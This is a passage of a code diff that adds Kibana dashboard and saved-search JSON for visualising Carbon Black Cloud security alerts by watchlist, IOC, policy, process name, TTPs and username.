10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.watchlists.name" + }, + "e30488e7-8423-4a65-bcb7-dd2f99b7eee4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "e30488e7-8423-4a65-bcb7-dd2f99b7eee4" + ], + "layerId": "2d5596cc-8954-4cf3-b056-235b6aa9efa8", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "6d4ed73e-d5ee-46d1-b6c1-27f13184569f" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "68b6d1b6-b955-4b8e-8649-98404fc4e871", + "w": 24, + "x": 0, + "y": 75 + }, + "panelIndex": "68b6d1b6-b955-4b8e-8649-98404fc4e871", + "title": "Distribution of Alerts by Watchlist Hit [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-08b18428-bc7f-4e09-8277-56b698796abf", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "08b18428-bc7f-4e09-8277-56b698796abf": { + "columnOrder": [ + "1a9eb0d1-f838-4c0d-b8c6-aafeec300d04", + "eaca1473-4252-4094-ac92-d11f9c59feeb" + ], + "columns": { + 
"1a9eb0d1-f838-4c0d-b8c6-aafeec300d04": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "IOC Field", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "eaca1473-4252-4094-ac92-d11f9c59feeb", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.ioc.field" + }, + "eaca1473-4252-4094-ac92-d11f9c59feeb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "eaca1473-4252-4094-ac92-d11f9c59feeb" + ], + "layerId": "08b18428-bc7f-4e09-8277-56b698796abf", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "1a9eb0d1-f838-4c0d-b8c6-aafeec300d04" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4ba78728-d819-4a52-9bfb-d3cdf9a8cdbd", + "w": 24, + "x": 24, + "y": 105 + }, + "panelIndex": "4ba78728-d819-4a52-9bfb-d3cdf9a8cdbd", + "title": "Distribution of Alerts by IOC field [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"indexpattern-datasource-layer-c595f8ee-2027-4013-9e5f-8761f03a0e50", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "c595f8ee-2027-4013-9e5f-8761f03a0e50": { + "columnOrder": [ + "5b59064d-7111-4c36-b053-2e01e2edc89e", + "de35e845-0662-4d2f-95e7-c63ac9869d73" + ], + "columns": { + "5b59064d-7111-4c36-b053-2e01e2edc89e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Policy Applied", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "de35e845-0662-4d2f-95e7-c63ac9869d73", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.policy_applied" + }, + "de35e845-0662-4d2f-95e7-c63ac9869d73": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "5b59064d-7111-4c36-b053-2e01e2edc89e" + ], + "layerId": "c595f8ee-2027-4013-9e5f-8761f03a0e50", + "layerType": "data", + "legendDisplay": "default", + "metric": "de35e845-0662-4d2f-95e7-c63ac9869d73", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "9944eade-0fb2-43c6-bb07-7013276204bd", + "w": 24, + "x": 0, + "y": 90 + }, + "panelIndex": "9944eade-0fb2-43c6-bb07-7013276204bd", + "title": "Distribution of Alerts by Policy Applied [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + 
"id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f4d3ca9c-1cdc-485c-84c8-dc6576838cf2", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "f4d3ca9c-1cdc-485c-84c8-dc6576838cf2": { + "columnOrder": [ + "99f69caa-f364-4b62-bdcd-9737f5646dcb", + "c984bc20-53ab-4d99-b212-bfb86427b9bb" + ], + "columns": { + "99f69caa-f364-4b62-bdcd-9737f5646dcb": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Workflow Status", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "c984bc20-53ab-4d99-b212-bfb86427b9bb", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.workflow.status" + }, + "c984bc20-53ab-4d99-b212-bfb86427b9bb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "99f69caa-f364-4b62-bdcd-9737f5646dcb" + ], + "layerId": "f4d3ca9c-1cdc-485c-84c8-dc6576838cf2", + "layerType": "data", + "legendDisplay": "default", + "metric": "c984bc20-53ab-4d99-b212-bfb86427b9bb", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "441f493c-7ead-42b8-940d-2d1ef599ce56", + "w": 24, + "x": 24, + "y": 120 + }, + "panelIndex": "441f493c-7ead-42b8-940d-2d1ef599ce56", + "title": "Distribution of Alerts by Workflow Status 
[Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-5b33df3c-e952-4285-af67-3ffb4f50d53f", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5b33df3c-e952-4285-af67-3ffb4f50d53f": { + "columnOrder": [ + "13cd1e9f-b2d7-4148-b0aa-248304fdaa39", + "1379a65d-f0af-4020-8f4b-a3064c018d93" + ], + "columns": { + "1379a65d-f0af-4020-8f4b-a3064c018d93": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "13cd1e9f-b2d7-4148-b0aa-248304fdaa39": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "1379a65d-f0af-4020-8f4b-a3064c018d93", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "process.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "1379a65d-f0af-4020-8f4b-a3064c018d93" + ], + "layerId": "5b33df3c-e952-4285-af67-3ffb4f50d53f", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "13cd1e9f-b2d7-4148-b0aa-248304fdaa39" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": 
"lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4103b75e-506f-48d5-ac42-38c4f2063b16", + "w": 24, + "x": 0, + "y": 105 + }, + "panelIndex": "4103b75e-506f-48d5-ac42-38c4f2063b16", + "title": "Distribution of Alerts by Process Name [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-15dfbaf6-974c-4236-bdb5-45f708c73c36", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "15dfbaf6-974c-4236-bdb5-45f708c73c36": { + "columnOrder": [ + "625766df-0169-4855-b2b2-dcdc79745f19", + "2113f826-3766-4711-b24a-6ccf31db4eb5" + ], + "columns": { + "2113f826-3766-4711-b24a-6ccf31db4eb5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "625766df-0169-4855-b2b2-dcdc79745f19": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Potential Malicious Activities - TTPS", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2113f826-3766-4711-b24a-6ccf31db4eb5", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.ttps" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "2113f826-3766-4711-b24a-6ccf31db4eb5" + ], + "layerId": "15dfbaf6-974c-4236-bdb5-45f708c73c36", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + 
"showGridlines": false, + "xAccessor": "625766df-0169-4855-b2b2-dcdc79745f19" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a38f5bf4-59a4-434f-a12b-c6355e71b3e3", + "w": 24, + "x": 24, + "y": 135 + }, + "panelIndex": "a38f5bf4-59a4-434f-a12b-c6355e71b3e3", + "title": "Distribution of Alerts by Potential Malicious Activities - TTPS [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fd06a4f8-b0db-44c0-8cf7-d5c80233ab8c", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "fd06a4f8-b0db-44c0-8cf7-d5c80233ab8c": { + "columnOrder": [ + "91aa5d6a-c860-40ad-8d56-cb292d4a0cd5", + "12f152c7-a887-4c9a-9a3f-71a3c6e60e9b" + ], + "columns": { + "12f152c7-a887-4c9a-9a3f-71a3c6e60e9b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "91aa5d6a-c860-40ad-8d56-cb292d4a0cd5": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Reason Codes", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "12f152c7-a887-4c9a-9a3f-71a3c6e60e9b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.reason_code" + 
} + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "91aa5d6a-c860-40ad-8d56-cb292d4a0cd5", + "isTransposed": false + }, + { + "columnId": "12f152c7-a887-4c9a-9a3f-71a3c6e60e9b", + "isTransposed": false + } + ], + "layerId": "fd06a4f8-b0db-44c0-8cf7-d5c80233ab8c", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "ccd8a34c-d68c-4471-aca6-d41e1185f176", + "w": 24, + "x": 24, + "y": 150 + }, + "panelIndex": "ccd8a34c-d68c-4471-aca6-d41e1185f176", + "title": "Top 10 Reason Codes [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-48c8290b-b387-4b56-a430-d49851725caa", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "48c8290b-b387-4b56-a430-d49851725caa": { + "columnOrder": [ + "ef64b3a4-8de3-4669-a35f-1ecc9e29ce2c", + "d1d440ef-ba5c-4b3f-85a8-da4e8014c1af" + ], + "columns": { + "d1d440ef-ba5c-4b3f-85a8-da4e8014c1af": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "ef64b3a4-8de3-4669-a35f-1ecc9e29ce2c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Malicious Process Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "d1d440ef-ba5c-4b3f-85a8-da4e8014c1af", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + 
"sourceField": "carbon_black_cloud.alert.process.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "ef64b3a4-8de3-4669-a35f-1ecc9e29ce2c", + "isTransposed": false + }, + { + "columnId": "d1d440ef-ba5c-4b3f-85a8-da4e8014c1af", + "isTransposed": false + } + ], + "layerId": "48c8290b-b387-4b56-a430-d49851725caa", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4e0459b0-fe4a-4199-8846-8a59e854e277", + "w": 24, + "x": 0, + "y": 135 + }, + "panelIndex": "4e0459b0-fe4a-4199-8846-8a59e854e277", + "title": "Top 10 Malicious Process Names [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-811141f4-f8d2-4a91-9702-0341d0efa27c", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "811141f4-f8d2-4a91-9702-0341d0efa27c": { + "columnOrder": [ + "c5ab6ff0-1969-48a0-9f14-7afe2506527b", + "ddc99f56-464c-45cb-9c13-530c4c9488cc" + ], + "columns": { + "c5ab6ff0-1969-48a0-9f14-7afe2506527b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "IOC Hit", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "ddc99f56-464c-45cb-9c13-530c4c9488cc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.ioc.hit" + }, + "ddc99f56-464c-45cb-9c13-530c4c9488cc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + 
"label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "c5ab6ff0-1969-48a0-9f14-7afe2506527b", + "isTransposed": false + }, + { + "columnId": "ddc99f56-464c-45cb-9c13-530c4c9488cc", + "isTransposed": false + } + ], + "layerId": "811141f4-f8d2-4a91-9702-0341d0efa27c", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "07a8d03f-6b85-46c4-8fce-9bf5a09b5139", + "w": 24, + "x": 0, + "y": 165 + }, + "panelIndex": "07a8d03f-6b85-46c4-8fce-9bf5a09b5139", + "title": "Top 10 IOC Hit [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a754e5d3-8c59-44be-9431-ecba97548823", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "a754e5d3-8c59-44be-9431-ecba97548823": { + "columnOrder": [ + "e70a2d5f-e544-4da5-b796-4f1a028470ea", + "69db9731-3d82-4086-b12c-885a7088cdc0" + ], + "columns": { + "69db9731-3d82-4086-b12c-885a7088cdc0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "e70a2d5f-e544-4da5-b796-4f1a028470ea": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Username", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "69db9731-3d82-4086-b12c-885a7088cdc0", + "type": "column" + }, + "orderDirection": "desc", 
+ "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "user.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "e70a2d5f-e544-4da5-b796-4f1a028470ea", + "isTransposed": false + }, + { + "columnId": "69db9731-3d82-4086-b12c-885a7088cdc0", + "isTransposed": false + } + ], + "layerId": "a754e5d3-8c59-44be-9431-ecba97548823", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "477eae84-de2f-49ba-acd3-b7cb615d0009", + "w": 24, + "x": 0, + "y": 150 + }, + "panelIndex": "477eae84-de2f-49ba-acd3-b7cb615d0009", + "title": "Top 10 Device Username [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 23, + "i": "f561888f-9762-4031-9f49-7c49e436849d", + "w": 48, + "x": 0, + "y": 180 + }, + "panelIndex": "f561888f-9762-4031-9f49-7c49e436849d", + "panelRefName": "panel_f561888f-9762-4031-9f49-7c49e436849d", + "type": "search", + "version": "7.17.0" + } + ], + "timeRestore": false, + "title": "[Logs Carbon Black Cloud] Alert V7", + "version": 1 + }, + "coreMigrationVersion": "7.17.0", + "id": "carbon_black_cloud-0954fb80-3a6c-11ed-a8e8-41eb8778c6de", + "migrationVersion": { + "dashboard": "7.17.0" + }, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2fdf6d77-fb2b-4d45-9fe0-1b1395b51cad:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2fdf6d77-fb2b-4d45-9fe0-1b1395b51cad:indexpattern-datasource-layer-3a59266a-6775-483f-99a4-806d42c20187", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"824ac716-7b3f-4aab-80e3-6eb2e2eba0c3:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "824ac716-7b3f-4aab-80e3-6eb2e2eba0c3:indexpattern-datasource-layer-5d228926-1588-4273-83fb-e1e030db620d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7428974e-7e40-44ed-ae98-d5f70484cc74:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7428974e-7e40-44ed-ae98-d5f70484cc74:indexpattern-datasource-layer-4860b265-1a18-4665-bfa6-d5b45d2b4698", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68904d73-a00c-4e08-9bfb-521ae79562db:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68904d73-a00c-4e08-9bfb-521ae79562db:indexpattern-datasource-layer-9df0b783-d395-42ed-91d4-245d42a3ce75", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a8013a95-c2ed-45fa-a431-ab322e09732c:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a8013a95-c2ed-45fa-a431-ab322e09732c:indexpattern-datasource-layer-dec17f01-e97d-46b5-9a93-68a8160b77fc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "21f1c122-4d3a-4d58-a2e5-dc2552fe00ae:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "21f1c122-4d3a-4d58-a2e5-dc2552fe00ae:indexpattern-datasource-layer-c0723707-2be7-4bf2-9464-b3224ff13091", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "62a0100e-29b4-4859-b753-61348d6f929a:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "62a0100e-29b4-4859-b753-61348d6f929a:indexpattern-datasource-layer-5d41bec8-a673-495e-9c69-de61f95d6e2e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a9b9f69f-e15c-4ad7-aed4-50baa5bc16fb:indexpattern-datasource-current-indexpattern", + 
"type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a9b9f69f-e15c-4ad7-aed4-50baa5bc16fb:indexpattern-datasource-layer-2e00b48b-7d5b-469f-9613-3503131f7a3f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3cbcaaf0-9ba1-4536-8192-28427cdcb8a0:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3cbcaaf0-9ba1-4536-8192-28427cdcb8a0:indexpattern-datasource-layer-fc3bcaa9-a33b-44c4-8d08-5643bf9665ae", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68b6d1b6-b955-4b8e-8649-98404fc4e871:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68b6d1b6-b955-4b8e-8649-98404fc4e871:indexpattern-datasource-layer-2d5596cc-8954-4cf3-b056-235b6aa9efa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4ba78728-d819-4a52-9bfb-d3cdf9a8cdbd:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4ba78728-d819-4a52-9bfb-d3cdf9a8cdbd:indexpattern-datasource-layer-08b18428-bc7f-4e09-8277-56b698796abf", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9944eade-0fb2-43c6-bb07-7013276204bd:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9944eade-0fb2-43c6-bb07-7013276204bd:indexpattern-datasource-layer-c595f8ee-2027-4013-9e5f-8761f03a0e50", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "441f493c-7ead-42b8-940d-2d1ef599ce56:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "441f493c-7ead-42b8-940d-2d1ef599ce56:indexpattern-datasource-layer-f4d3ca9c-1cdc-485c-84c8-dc6576838cf2", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4103b75e-506f-48d5-ac42-38c4f2063b16:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"4103b75e-506f-48d5-ac42-38c4f2063b16:indexpattern-datasource-layer-5b33df3c-e952-4285-af67-3ffb4f50d53f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a38f5bf4-59a4-434f-a12b-c6355e71b3e3:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a38f5bf4-59a4-434f-a12b-c6355e71b3e3:indexpattern-datasource-layer-15dfbaf6-974c-4236-bdb5-45f708c73c36", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ccd8a34c-d68c-4471-aca6-d41e1185f176:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ccd8a34c-d68c-4471-aca6-d41e1185f176:indexpattern-datasource-layer-fd06a4f8-b0db-44c0-8cf7-d5c80233ab8c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4e0459b0-fe4a-4199-8846-8a59e854e277:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4e0459b0-fe4a-4199-8846-8a59e854e277:indexpattern-datasource-layer-48c8290b-b387-4b56-a430-d49851725caa", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "07a8d03f-6b85-46c4-8fce-9bf5a09b5139:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "07a8d03f-6b85-46c4-8fce-9bf5a09b5139:indexpattern-datasource-layer-811141f4-f8d2-4a91-9702-0341d0efa27c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "477eae84-de2f-49ba-acd3-b7cb615d0009:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "477eae84-de2f-49ba-acd3-b7cb615d0009:indexpattern-datasource-layer-a754e5d3-8c59-44be-9431-ecba97548823", + "type": "index-pattern" + }, + { + "id": "carbon_black_cloud-b23c6730-3a6b-11ed-a8e8-41eb8778c6de", + "name": "f561888f-9762-4031-9f49-7c49e436849d:panel_f561888f-9762-4031-9f49-7c49e436849d", + "type": "search" + } + ], + "type": "dashboard" +} \ No newline at end of file 
diff --git a/packages/system/kibana/search/system-eb0039f0-fa7f-11e6-a1df-a78bd7504d38.json b/packages/carbon_black_cloud/kibana/search/carbon_black_cloud-b23c6730-3a6b-11ed-a8e8-41eb8778c6de.json similarity index 62% rename from packages/system/kibana/search/system-eb0039f0-fa7f-11e6-a1df-a78bd7504d38.json rename to packages/carbon_black_cloud/kibana/search/carbon_black_cloud-b23c6730-3a6b-11ed-a8e8-41eb8778c6de.json index 5214b472f78..52f332b9aed 100644 --- a/packages/system/kibana/search/system-eb0039f0-fa7f-11e6-a1df-a78bd7504d38.json +++ b/packages/carbon_black_cloud/kibana/search/carbon_black_cloud-b23c6730-3a6b-11ed-a8e8-41eb8778c6de.json @@ -1,19 +1,21 @@ { "attributes": { "columns": [ - "group.name", - "group.id" + "event.id", + "event.reason", + "carbon_black_cloud.alert.process.name", + "carbon_black_cloud.alert.category" ], "description": "", - "hits": 0, + "grid": {}, + "hideChart": false, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [], - "highlightAll": true, "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", "query": { "language": "kuery", - "query": 